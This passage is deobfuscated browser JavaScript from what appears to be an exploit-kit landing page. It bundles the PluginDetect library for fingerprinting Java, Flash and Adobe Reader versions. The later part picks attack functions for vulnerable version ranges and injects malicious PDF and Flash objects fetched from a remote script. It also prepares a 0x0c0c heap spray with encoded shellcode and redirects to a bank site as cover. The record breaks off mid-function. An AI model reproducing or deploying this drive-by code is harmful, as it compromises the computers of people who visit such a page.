  1017. var a = this , e = a.$, b = a.$$, c = (a.hasRun || a.disabled());
  1018. a.hasRun = 1;
  1019. if (c){
  1020. return a
  1021. }
  1022. var i = [], k = [1, 5, 0, 14], j = [1, 6, 0, 2], h = [1, 3, 1, 0], g = [1, 4, 2,
  1023. 0], f = [1, 5, 0, 7], d = b.getInfo ? true : false, l = {
  1024. }
  1025. ;
  1026. if (b.minIEver <= e.verIE){
  1027. i = a.search(j, j, d);
  1028. if (0 < i.length && d){
  1029. i = a.search(k, k, d)
  1030. }
  1031. }
  1032. else {
  1033. if (d){
  1034. i = a.search(f, f, true)
  1035. }
  1036. if (i.length == 0){
  1037. i = a.search(h, g, false)
  1038. }
  1039. }
  1040. if (i.length){
  1041. a.version = i[0];
  1042. a.VERSIONS = [].concat(i)
  1043. }
  1044. ;
  1045. return a
  1046. }
  1047. , search : function (a, j, p){
  1048. var h, d, f = this , e = f.$, k = f.$$, n, c, l, q, b, o, r, i = [];
  1049. if (0 < e.compareNums(a.join(","), j.join(","))){
  1050. j = a
  1051. }
  1052. j = e.formatNum(j.join(","));
  1053. var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (0
  1054. < a[3] ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
  1055. for (h = 0; h < f.JavaVersions.length; h ++ ){
  1056. d = f.JavaVersions[h];
  1057. n = "JavaPlugin." + d[0] + "" + d[1];
  1058. b = d[0] + "." + d[1] + ".";
  1059. for (l = d[2];
  1060. l >= 0; l -- ){
  1061. r = "JavaWebStart.isInstalled." + b + l + ".0";
  1062. if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO(r
  1063. )){
  1064. continue
  1065. }
  1066. m = 0 > e.compareNums(d[0] + "," + d[1] + "," + l + ",0", s) ? true : false;
  1067. for (q = d[3];
  1068. q >= 0; q -- ){
  1069. c = l + "_" + (q < 10 ? "0" + q : q);
  1070. o = n + c;
  1071. if (e.getAXO(o) && (m || e.getAXO(r))){
  1072. i.push(b + c);
  1073. if (!p){
  1074. return i
  1075. }
  1076. }
  1077. if (o == g){
  1078. return i
  1079. }
  1080. }
  1081. if (e.getAXO(n + l) && (m || e.getAXO(r))){
  1082. i.push(b + l);
  1083. if (!p){
  1084. return i
  1085. }
  1086. }
  1087. if (n + l == g){
  1088. return i
  1089. }
  1090. }
  1091. }
  1092. return i
  1093. }
  1094. }
  1095. , navMime : {
  1096. $ : 1, hasRun : 0, mimetype : "", version : "", length : 0, mimeObj : 0, pluginObj
  1097. : 0, disabled : function (){
  1098. return this .$$.isDisabled.navMime()
  1099. }
  1100. , query : function (){
  1101. var i = this , f = i.$, a = i.$$, b = (i.hasRun || i.disabled());
  1102. i.hasRun = 1;
  1103. if (b){
  1104. return i
  1105. }
  1106. ;
  1107. var n =/^\ s * application \/ x - java - applet;
  1108. jpi - version \ s *=\ s * ( \ d. * )$ / i, g, l, j, d = "", h = "a", o, m, k =
  1109. {
  1110. }
  1111. , c = f.formatNum("0");
  1112. for (l = 0; l < navigator.mimeTypes.length; l ++ ){
  1113. o = navigator.mimeTypes[l];
  1114. m = o ? o.enabledPlugin : 0;
  1115. g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0;
  1116. if (g && m && (m.description || m.name)){
  1117. if (!k[h + g]){
  1118. i.length ++
  1119. }
  1120. k[h + g] = o.type;
  1121. if (0 < f.compareNums(g, c)){
  1122. c = g
  1123. }
  1124. }
  1125. }
  1126. g = k[h + c];
  1127. if (g){
  1128. o = f.hasMimeType(g);
  1129. i.mimeObj = o;
  1130. i.pluginObj = o ? o.enabledPlugin : 0;
  1131. i.mimetype = g;
  1132. i.version = c
  1133. }
  1134. ;
  1135. return i
  1136. }
  1137. }
  1138. , navPlugin : {
  1139. $ : 1, hasRun : 0, version : "", disabled : function (){
  1140. return this .$$.isDisabled.navPlugin()
  1141. }
  1142. , query : function (){
  1143. var m = this , e = m.$, c = m.$$, h = c.navigator, j, l, k, g, d, a, i, f = 0, b
  1144. = (m.hasRun || m.disabled());
  1145. m.hasRun = 1;
  1146. if (b){
  1147. return m
  1148. }
  1149. ;
  1150. a = h.pluginObj.name || "";
  1151. i = h.pluginObj.description || "";
  1152. if (!f || c.debug){
  1153. g =/ Java. * TM. * Platform[ ^\ d] * ( \ d + )( ?: [ \ ., _]( \ d * )) ? ( ?:\
  1154. s * [Update] +\ s * ( \ d * )) ?/ i;
  1155. if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5){
  1156. f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.
  1157. $3 ? RegExp.$3 : "0")
  1158. }
  1159. }
  1160. if (!f || c.debug){
  1161. g =/ Java[ ^\ d] * Plug - in / i;
  1162. l = g.test(i) ? e.formatNum(e.getNum(i)) : 0;
  1163. k = g.test(a) ? e.formatNum(e.getNum(a)) : 0;
  1164. if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e.
  1165. formatNum("2")) >= 0)){
  1166. l = 0
  1167. }
  1168. if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e.
  1169. formatNum("2")) >= 0)){
  1170. k = 0
  1171. }
  1172. d = l && k ? (0 < e.compareNums(l, k) ? l : k) : (l || k);
  1173. if (d){
  1174. f = d
  1175. }
  1176. }
  1177. if (!f && e.isSafari && e.OS == 2){
  1178. j = e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa", 0);
  1179. if (j){
  1180. l = e.getNum(j.description);
  1181. if (l){
  1182. f = l
  1183. }
  1184. }
  1185. }
  1186. ;
  1187. if (f){
  1188. m.version = e.formatNum(f)
  1189. }
  1190. ;
  1191. return m
  1192. }
  1193. }
  1194. , lang : {
  1195. $ : 1, System : {
  1196. $ : 1, hasRun : 0, result : [null, null], disabled : function (){
  1197. return this .$$.isDisabled.windowDotJava()
  1198. }
  1199. , getPropertyHas : function (a){
  1200. var b = this , d = b.$, c = b.getProperty()[0];
  1201. return (a && c && d.compareNums(d.formatNum(a), d.formatNum(c)) === 0) ? 1 : 0
  1202. }
  1203. , getProperty : function (){
  1204. var f = this , g = f.$, d = f.$$, i, h = {
  1205. }
  1206. , b = f.hasRun || f.disabled();
  1207. f.hasRun = 1;
  1208. if (!b){
  1209. var a = "java_qqq990";
  1210. g[a] = null;
  1211. try {
  1212. var c = document.createElement("script");
  1213. c.type = "text/javascript";
  1214. c.appendChild(document.createTextNode('
  1215. (function(){var e,a;try{a=[window.java.lang.System.getProperty("java.version")+" ",window.
  1216. java.lang.System.getProperty("java.vendor")+" "]}catch(e){};' + g.name + "." + a +
  1217. "=a||0})();"));
  1218. g.head.insertBefore(c, g.head.firstChild);
  1219. g.head.removeChild(c)
  1220. }
  1221. catch (i){
  1222. }
  1223. if (g[a] && g.isArray(g[a])){
  1224. f.result = [].concat(g[a])
  1225. }
  1226. }
  1227. return f.result
  1228. }
  1229. }
  1230. }
  1231. , applet : {
  1232. $ : 1, results : [[null, null], [null, null], [null, null]], getResult : function
  1233. (){
  1234. var c = this .results, a, b = [];
  1235. for (a = 0; a < c.length; a ++ ){
  1236. b = c[a];
  1237. if (b[0]){
  1238. break
  1239. }
  1240. }
  1241. return [].concat(b)
  1242. }
  1243. , HTML : [0, 0, 0], active : [0, 0, 0], DummyObjTagHTML : 0, DummySpanTagHTML : 0,
  1244. allowed : [1, 1, 1], VerifyTagsHas : function (c){
  1245. var d = this , b;
  1246. for (b = 0; b < d.allowed.length; b ++ ){
  1247. if (d.allowed[b] === c){
  1248. return 1
  1249. }
  1250. }
  1251. return 0
  1252. }
  1253. , saveAsVerifyTagsArray : function (c){
  1254. var b = this , d = b.$, a;
  1255. if (d.isArray(c)){
  1256. for (a = 0; a < b.allowed.length; a ++ ){
  1257. if (d.isNum(c[a])){
  1258. if (0 > c[a]){
  1259. c[a] = 0
  1260. }
  1261. if (c[a] > 3){
  1262. c[a] = 3
  1263. }
  1264. b.allowed[a] = c[a]
  1265. }
  1266. }
  1267. }
  1268. }
  1269. , setVerifyTagsArray : function (d){
  1270. var b = this , c = b.$, a = b.$$;
  1271. if (a.getVersionDone === null){
  1272. b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
  1273. }
  1274. if (a.debug || (a.verify && a.verify.isEnabled())){
  1275. b.saveAsVerifyTagsArray([3, 3, 3])
  1276. }
  1277. else {
  1278. if (d){
  1279. b.saveAsVerifyTagsArray(d)
  1280. }
  1281. }
  1282. }
  1283. , allDisabled : function (){
  1284. return this .$$.isDisabled.allApplets()
  1285. }
  1286. , isDisabled : function (d){
  1287. var b = this , c = b.$, a = b.$$;
  1288. if (d == 2 &&! c.isIE){
  1289. return 1
  1290. }
  1291. if (d === 0 || d == 2){
  1292. return a.isDisabled.ObjectTag()
  1293. }
  1294. if (d == 1){
  1295. return a.isDisabled.AppletTag()
  1296. }
  1297. }
  1298. , can_Insert_Query : function (b){
  1299. var a = this ;
  1300. if (a.HTML[b]){
  1301. return 0
  1302. }
  1303. return !a.isDisabled(b)
  1304. }
  1305. , can_Insert_Query_Any : function (){
  1306. var b = this , a;
  1307. for (a = 0; a < b.results.length; a ++ ){
  1308. if (b.can_Insert_Query(a)){
  1309. return 1
  1310. }
  1311. }
  1312. return 0
  1313. }
  1314. , should_Insert_Query : function (d){
  1315. var b = this , e = b.allowed, c = b.$, a = b.$$;
  1316. if (!b.can_Insert_Query(d)){
  1317. return 0
  1318. }
  1319. if (e[d] == 3){
  1320. return 1
  1321. }
  1322. if (e[d] == 2.8 &&! b.getResult()[0]){
  1323. return 1
  1324. }
  1325. if (e[d] == 2.5 &&! a.lang.System.getProperty()[0]){
  1326. return 1
  1327. }
  1328. if (e[d] == 2.2 &&! a.lang.System.getProperty()[0] &&! b.getResult()[0]){
  1329. return 1
  1330. }
  1331. if (!a.nonAppletDetectionOk(a.version0)){
  1332. if (e[d] == 2){
  1333. return 1
  1334. }
  1335. if (e[d] == 1 &&! b.getResult()[0]){
  1336. return 1
  1337. }
  1338. }
  1339. return 0
  1340. }
  1341. , should_Insert_Query_Any : function (){
  1342. var b = this , a;
  1343. for (a = 0; a < b.allowed.length; a ++ ){
  1344. if (b.should_Insert_Query(a)){
  1345. return 1
  1346. }
  1347. }
  1348. return 0
  1349. }
  1350. , query : function (f){
  1351. var h, a = this , g = a.$, d = a.$$, i = null, j = null, b = a.results, c;
  1352. if ((b[f][0] && b[f][1]) || (d.debug && d.OTF < 3)){
  1353. return
  1354. }
  1355. c = g.getDOMobj(a.HTML[f], true);
  1356. if (c){
  1357. try {
  1358. i = g.getNum(c.getVersion() + " ");
  1359. j = c.getVendor() + " ";
  1360. c.statusbar(g.winLoaded ? " " : " ")
  1361. }
  1362. catch (h){
  1363. }
  1364. if (i && g.isStrNum(i)){
  1365. b[f] = [i, j]
  1366. }
  1367. else {
  1368. }
  1369. ;
  1370. try {
  1371. if (g.isIE && i && c.readyState != 4){
  1372. g.garbage = true;
  1373. c.parentNode.removeChild(c)
  1374. }
  1375. }
  1376. catch (h){
  1377. }
  1378. }
  1379. }
  1380. , insert_Query_Any : function (){
  1381. var d = this , i = d.$, e = d.$$, l = d.results, p = d.HTML, a =
  1382. "&nbsp;&nbsp;&nbsp;&nbsp;", g = "A.class", m = i.file.getValid(e);
  1383. if (!m){
  1384. return d.getResult()
  1385. }
  1386. if (e.OTF < 1){
  1387. e.OTF = 1
  1388. }
  1389. if (d.allDisabled()){
  1390. return d.getResult()
  1391. }
  1392. if (e.OTF < 1.5){
  1393. e.OTF = 1.5
  1394. }
  1395. var j = m.name + m.ext, h = m.path;
  1396. var f = ["archive", j, "code", g], c = ["mayscript", "true"], o = ["scriptable",
  1397. "true"].concat(c), n = e.navigator, b =! i.isIE && n.mimeObj && n.mimeObj.type ?
  1398. n.mimeObj.type : e.mimeType[0];
  1399. if (d.should_Insert_Query(0)){
  1400. if (e.OTF < 2){
  1401. e.OTF = 2
  1402. }
  1403. ;
  1404. p[0] = i.isIE ? i.insertHTML("object", ["type", b], ["codebase", h].concat(f).
  1405. concat(o), a, e) : i.insertHTML("object", ["type", b], ["codebase", h].concat(
  1406. f).concat(o), a, e);
  1407. l[0] = [0, 0];
  1408. d.query(0)
  1409. }
  1410. if (d.should_Insert_Query(1)){
  1411. if (e.OTF < 2){
  1412. e.OTF = 2
  1413. }
  1414. ;
  1415. p[1] = i.isIE ? i.insertHTML("applet", ["alt", a].concat(c).concat(f), [
  1416. "codebase", h].concat(c), a, e) : i.insertHTML("applet", ["codebase", h, "alt"
  1417. , a].concat(c).concat(f), [].concat(c), a, e);
  1418. l[1] = [0, 0];
  1419. d.query(1)
  1420. }
  1421. if (d.should_Insert_Query(2)){
  1422. if (e.OTF < 2){
  1423. e.OTF = 2
  1424. }
  1425. ;
  1426. p[2] = i.isIE ? i.insertHTML("object", ["classid", e.classID], ["codebase", h
  1427. ].concat(f).concat(o), a, e) : i.insertHTML();
  1428. l[2] = [0, 0];
  1429. d.query(2)
  1430. }
  1431. if (!d.DummyObjTagHTML &&! e.isDisabled.ObjectTag()){
  1432. d.DummyObjTagHTML = i.insertHTML("object", [], [], a)
  1433. }
  1434. if (!d.DummySpanTagHTML){
  1435. d.DummySpanTagHTML = i.insertHTML("", [], [], a)
  1436. }
  1437. ;
  1438. var k = e.NOTF;
  1439. if (e.OTF < 3 && k.shouldContinueQuery()){
  1440. e.OTF = 3;
  1441. k.onIntervalQuery = i.handler(k.$$onIntervalQuery, k);
  1442. if (!i.winLoaded){
  1443. i.WLfuncs0.push([k.winOnLoadQuery, k])
  1444. }
  1445. setTimeout(k.onIntervalQuery, k.intervalLength)
  1446. }
  1447. ;
  1448. return d.getResult()
  1449. }
  1450. }
  1451. , NOTF : {
  1452. $ : 1, count : 0, countMax : 25, intervalLength : 250, shouldContinueQuery :
  1453. function (){
  1454. var e = this , d = e.$, c = e.$$, b = c.applet, a;
  1455. for (a = 0; a < b.results.length; a ++ ){
  1456. if (b.HTML[a] &&! b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1
  1457. &&! b.getResult()[0])) && e.isAppletActive(a) >= 0){
  1458. return 1
  1459. }
  1460. }
  1461. return 0
  1462. }
  1463. , isJavaActive : function (d){
  1464. var f = this , c = f.$$, a, b, e =- 9;
  1465. for (a = 0; a < c.applet.HTML.length; a ++ ){
  1466. b = f.isAppletActive(a, d);
  1467. if (b > e){
  1468. e = b
  1469. }
  1470. }
  1471. return e
  1472. }
  1473. , isAppletActive : function (c, a){
  1474. var d = this , b = d.$$.applet.active;
  1475. if (!a){
  1476. b[c] = d.isAppletActive_(c)
  1477. }
  1478. return b[c]
  1479. }
  1480. , isAppletActive_ : function (d){
  1481. var g = this , f = g.$, b = g.$$, l = b.navigator, a = b.applet, h = a.HTML[d],
  1482. i, k, c = 0, j = f.getTagStatus(h, a.DummySpanTagHTML, a.DummyObjTagHTML, g.
  1483. count);
  1484. if (j ==- 2){
  1485. return - 2
  1486. }
  1487. try {
  1488. if (f.isIE && b.minIEver <= f.verIE && f.getDOMobj(h).object){
  1489. return 1
  1490. }
  1491. }
  1492. catch (i){
  1493. }
  1494. for (k = 0; k < a.active.length; k ++ ){
  1495. if (0 < a.active[k]){
  1496. c = 1
  1497. }
  1498. }
  1499. if (j == 1 && (f.isIE || ((b.version0 && l.javaEnabled() && l.mimeObj && (h.
  1500. tagName == "object" || c)) || b.lang.System.getProperty()[0]))){
  1501. return 1
  1502. }
  1503. if (0 > j){
  1504. return - 1
  1505. }
  1506. return 0
  1507. }
  1508. , winOnLoadQuery : function (c, d){
  1509. var b = d.$$, a;
  1510. if (b.OTF == 3){
  1511. a = d.queryAllApplets();
  1512. d.queryCompleted(a[1], a[2])
  1513. }
  1514. }
  1515. , $$onIntervalQuery : function (d){
  1516. var c = d.$, b = d.$$, a;
  1517. if (b.OTF == 3){
  1518. a = d.queryAllApplets();
  1519. if (!d.shouldContinueQuery() || (c.winLoaded && d.count > d.countMax)){
  1520. d.queryCompleted(a[1], a[2])
  1521. }
  1522. }
  1523. d.count++;
  1524. if (b.OTF == 3){
  1525. setTimeout(d.onIntervalQuery, d.intervalLength)
  1526. }
  1527. }
  1528. , queryAllApplets : function (){
  1529. var g = this , f = g.$, e = g.$$, d = e.applet, b, a, c;
  1530. for (b = 0; b < d.results.length; b ++ ){
  1531. d.query(b)
  1532. }
  1533. a = d.getResult();
  1534. c = a[0] ? true : false;
  1535. return [c, a[0], a[1]]
  1536. }
  1537. , queryCompleted : function (c, f){
  1538. var e = this , d = e.$, b = e.$$;
  1539. if (b.OTF >= 4){
  1540. return
  1541. }
  1542. b.OTF = 4;
  1543. var a = e.isJavaActive();
  1544. b.setPluginStatus(c, f, 0);
  1545. if (b.funcs){
  1546. d.callArray(b.funcs)
  1547. }
  1548. if (d.onDoneEmptyDiv){
  1549. d.onDoneEmptyDiv()
  1550. }
  1551. }
  1552. }
  1553. , zz : 0
  1554. }
  1555. , flash : {
  1556. mimeType : "application/x-shockwave-flash", progID : "ShockwaveFlash.ShockwaveFlash"
  1557. , classID : "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000", getVersion : function (){
  1558. var b = function (i){
  1559. if (!i){
  1560. return null
  1561. }
  1562. var e =/ [ \ d][ \ d \,\ . \ s] * [rRdD]{
  1563. 0, 1
  1564. }
  1565. [ \ d \, ] */ .exec(i);
  1566. return e ? e[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null
  1567. }
  1568. ;
  1569. var j = this , g = j.$, k, h, l = null, c = null, a = null, f, m, d;
  1570. if (!g.isIE){
  1571. m = g.hasMimeType(j.mimeType);
  1572. if (m){
  1573. f = g.getDOMobj(g.insertHTML("object", ["type", j.mimeType], [], "", j));
  1574. try {
  1575. l = g.getNum(f.GetVariable("$version"))
  1576. }
  1577. catch (k){
  1578. }
  1579. }
  1580. if (!l){
  1581. d = m ? m.enabledPlugin : null;
  1582. if (d && d.description){
  1583. l = b(d.description)
  1584. }
  1585. if (l){
  1586. l = g.getPluginFileVersion(d, l)
  1587. }
  1588. }
  1589. }
  1590. else {
  1591. for (h = 15; h > 2; h -- ){
  1592. c = g.getAXO(j.progID + "." + h);
  1593. if (c){
  1594. a = h.toString();
  1595. break
  1596. }
  1597. }
  1598. if (!c){
  1599. c = g.getAXO(j.progID)
  1600. }
  1601. if (a == "6"){
  1602. try {
  1603. c.AllowScriptAccess = "always"
  1604. }
  1605. catch (k){
  1606. return "6,0,21,0"
  1607. }
  1608. }
  1609. try {
  1610. l = b(c.GetVariable("$version"))
  1611. }
  1612. catch (k){
  1613. }
  1614. if (!l && a){
  1615. l = a
  1616. }
  1617. }
  1618. j.installed = l ? 1 :- 1;
  1619. j.version = g.formatNum(l);
  1620. return true
  1621. }
  1622. }
  1623. , adobereader : {
  1624. mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
  1625. "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
  1626. {
  1627. }
  1628. , pluginHasMimeType : function (d, c, f){
  1629. var b = this , e = b.$, a;
  1630. for (ain d){
  1631. if (d[a] && d[a].type && d[a].type == c){
  1632. return 1
  1633. }
  1634. }
  1635. if (e.getMimeEnabledPlugin(c, f)){
  1636. return 1
  1637. }
  1638. return 0
  1639. }
  1640. , getVersion : function (l, j){
  1641. var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
  1642. if (d.isString(j)){
  1643. j = j.replace(/\s/g, "");
  1644. if (j){
  1645. k = j
  1646. }
  1647. }
  1648. else {
  1649. j = null
  1650. }
  1651. if (d.isDefined(g.INSTALLED[k])){
  1652. g.installed = g.INSTALLED[k];
  1653. return
  1654. }
  1655. if (!d.isIE){
  1656. a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  1657. if (g.getVersionDone !== 0){
  1658. g.getVersionDone = 0;
  1659. b = d.getMimeEnabledPlugin(g.mimeType, a);
  1660. if (!j){
  1661. n = b
  1662. }
  1663. if (!b && d.hasMimeType(g.mimeType)){
  1664. b = d.findNavPlugin(a, 0)
  1665. }
  1666. if (b){
  1667. g.navPluginObj = b;
  1668. h = d.getNum(b.description) || d.getNum(b.name);
  1669. h = d.getPluginFileVersion(b, h);
  1670. if (!h && d.OS == 1){
  1671. if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
  1672. h = "9"
  1673. }
  1674. else {
  1675. if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
  1676. h = "8"
  1677. }
  1678. }
  1679. }
  1680. }
  1681. }
  1682. else {
  1683. h = g.version
  1684. }
  1685. if (!d.isDefined(n)){
  1686. n = d.getMimeEnabledPlugin(k, a)
  1687. }
  1688. g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
  1689. }
  1690. else {
  1691. b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
  1692. c =/=\ s * ([ \ d \ .] + ) / g;
  1693. try {
  1694. f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
  1695. ""], "", g))).GetVersions();
  1696. for (m = 0; m < 5; m ++ ){
  1697. if (c.test(f) && (!h || h < RegExp.$1)){
  1698. h = RegExp.$1
  1699. }
  1700. }
  1701. }
  1702. catch (i){
  1703. }
  1704. g.installed = h ? 1 : (b ? 0 :- 1)
  1705. }
  1706. if (!g.version){
  1707. g.version = d.formatNum(h)
  1708. }
  1709. g.INSTALLED[k] = g.installed
  1710. }
  1711. }
  1712. , zz : 0
  1713. }
  1714. }
  1715. ;
  1716. PluginDetect.initScript();
  1717. PluginDetect.getVersion(".");
  1718. var $$ = PluginDetect;
  1719. function x(s){
  1720. d = [];
  1721. for (i = 0; i < s.length; i ++ ){
  1722. k = (s.charCodeAt(i)).toString(33);
  1723. d.push(k);
  1724. }
  1725. ;
  1726. return d.join(":");
  1727. }
  1728. end_redirect = function (){
  1729. window.location.href = 'http://citibank.com';
  1730. }
  1731. ;
  1732. function j1(){
  1733. return true;
  1734. }
  1735. function j2(){
  1736. return true;
  1737. }
  1738. function p1(){
  1739. var d = document.createElement("object");
  1740. d.setAttribute("data", "/detects/operation_alert_login.php?xbxf=" + x("c833f") +
  1741. "&ehwdjc=" + x("cbd") + "&xzoidy=1m:1g:1f:1j:1m:1k:30:1k:33:1o&ghh=" + x(pdfver.join("."
  1742. )));
  1743. d.setAttribute("type", "application/pdf");
  1744. document.body.appendChild(d);
  1745. }
  1746. function p2(){
  1747. var d = document.createElement("object");
  1748. d.setAttribute("data", "/detects/operation_alert_login.php?pun=" + x("c833f") +
  1749. "&nzfzrr=" + x("o") + "&pjd=1m:1g:1f:1j:1m:1k:30:1k:33:1o&mqd=" + x(pdfver.join(".")));
  1750. d.setAttribute("type", "application/pdf");
  1751. document.body.appendChild(d);
  1752. }
  1753. function f1(){
  1754. var oSpan = document.createElement("span");
  1755. document.body.appendChild(oSpan);
  1756. var url = "/detects/operation_alert_login.php?oku=" + x("c833f") + "&mnhhezq=" + x(
  1757. "kyheca") + "
  1758. &qogrvhzm=1m:1g:1f:1j:1m:1k:30:1k:33:1o&info=02e677bd3b70fa4a767eba654f026fbeddee123961f23
  1759. 3d2f17d25d509e17b9e305ea63748ae5b1d02f108923137849bdc32e37677d516482b57c000b3eb4145adcc060
  1760. bc563a7";
  1761. oSpan.innerHTML = "
  1762. <object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='
  1763. 400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param
  1764. name='movie' value='" + url + "' /><embed src='" + url + "
  1765. ' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' plu
  1766. ginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
  1767. }
  1768. function getCN(){
  1769. return "/detects/operation_alert_login.php?jdml=" + x("c833f") + "&wmml=" + x("kjjfz") +
  1770. "&czhxluf=1m:1g:1f:1j:1m:1k:30:1k:33:1o&llu=dwxhazgr"
  1771. }
  1772. function getBlockSize(){
  1773. return 1024
  1774. }
  1775. function getAllocSize(){
  1776. return 1024 * 1024
  1777. }
  1778. function getAllocCount(){
  1779. return 300
  1780. }
  1781. function getFillBytes(){
  1782. var a = '%u' + '0c0c';
  1783. return a + a
  1784. }
  1785. function getShellCode(){
  1786. var a = "
  1787. 8282!%5185!%64c4!%44e0!%0551!%e004!%9134!%f451!%74e0!%2191!%b1b1!%3421!%2191!%b181!%3421!%
  1788. 2191!%9154!%2421!%2191!%91e4!%f421!%2191!%9154!%d451!%e015!%b1b1!%1421!%2191!%9114!%6421!%
  1789. 2191!%b181!%e451!%7174!%0485!%6085!%1464!%74f4!%7744!%a5c5!%44d4!%7794!%7464!%c514!%a594!%
  1790. 85d4!%7074!%c5b5!%d4b4!%d4c5!%70c4!%1425!%60a4!%c474!%7464!%d4b4!%64c5!%7414!%d485!%f444!%
  1791. d494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%
  1792. 6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%
  1793. 423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%
  1794. 2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%
  1795. f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%
  1796. e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%
  1797. 0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%
  1798. 87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%
  1799. 3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%
  1800. 0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%
  1801. 9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%
  1802. 413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%
  1803. 9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%
  1804. d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%df08!%9eef!%6618!%139c!%0185!%cfbe!%4ecf!%
  1805. 6638!%1414!%1414!%".split("").reverse().join("");
  1806. return a["replace"](/\%!/g, "%" + "u")
  1807. }
  1808. ;
  1809. function ff2(){
  1810. var oSpan = document.createElement("span");
  1811. var url = "/detects/operation_alert_login.php?gfdbcf=" + x("c833f") + "&jjoipve=" + x(
  1812. "asnk") + "&ezoyqljc=1m:1g:1f:1j:1m:1k:30:1k:33:1o&nkj=bdx";
  1813. oSpan.innerHTML = "
  1814. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  1815. '><param name='movie' value='" + url + "
  1816. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  1817. src='" + url + "
  1818. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  1819. ' width='10' height='10'></embed></object>";
  1820. document.body.appendChild(oSpan);
  1821. }
  1822. document.write('');
  1823. setTimeout(end_redirect, 61000);
  1824. var pdfver = [];
  1825. function svwrbew6436b($){
  1826. var ar = [];
  1827. var javax = ($.getVersion("Ja" + "va") + ".").toString()["split"](".");
  1828. if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 7 && javax[3] < 9
  1829. ))){
  1830. ar["push"](j2);
  1831. }
  1832. else if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 6 && javax[3
  1833. ] < 33) || (javax[0] == 1 && javax[1] < 6))){
  1834. ar["push"](j1);
  1835. }
  1836. pdfver = PluginDetect.getVersion("AdobeReader");
  1837. if (window.document)if (typeof pdfver == "string"){
  1838. pdfver = pdfver["split"](".")
  1839. }
  1840. else {
  1841. pdfver = [0, 0, 0, 0]
  1842. }
  1843. if (pdfver[0] > 0 && pdfver[0] < 8){
  1844. if (window.document)ar["push"](p1);
  1845. }
  1846. if (window.document && (pdfver[0] == 8 || (pdfver[0] == 9 && pdfver[1] < 4))){
  1847. ar["push"](p2);
  1848. }
  1849. var ver = ($$.getVersion("Flash") + ".").toString()["split"](".");
  1850. if (((ver[0] == 10 && ver[1] == 0 && ver[2] > 40) || (window.document && (ver[0] == 10 &&
  1851. ver[1] > 0) && (ver[0] == 10 && ver[1] < 2))) || window.document && ((ver[0] == 10 &&
  1852. ver[1] == 2 && ver[2] < 159) || (ver[0] == 10 && ver[1] < 2))){
  1853. ar["push"](ff2);
  1854. }
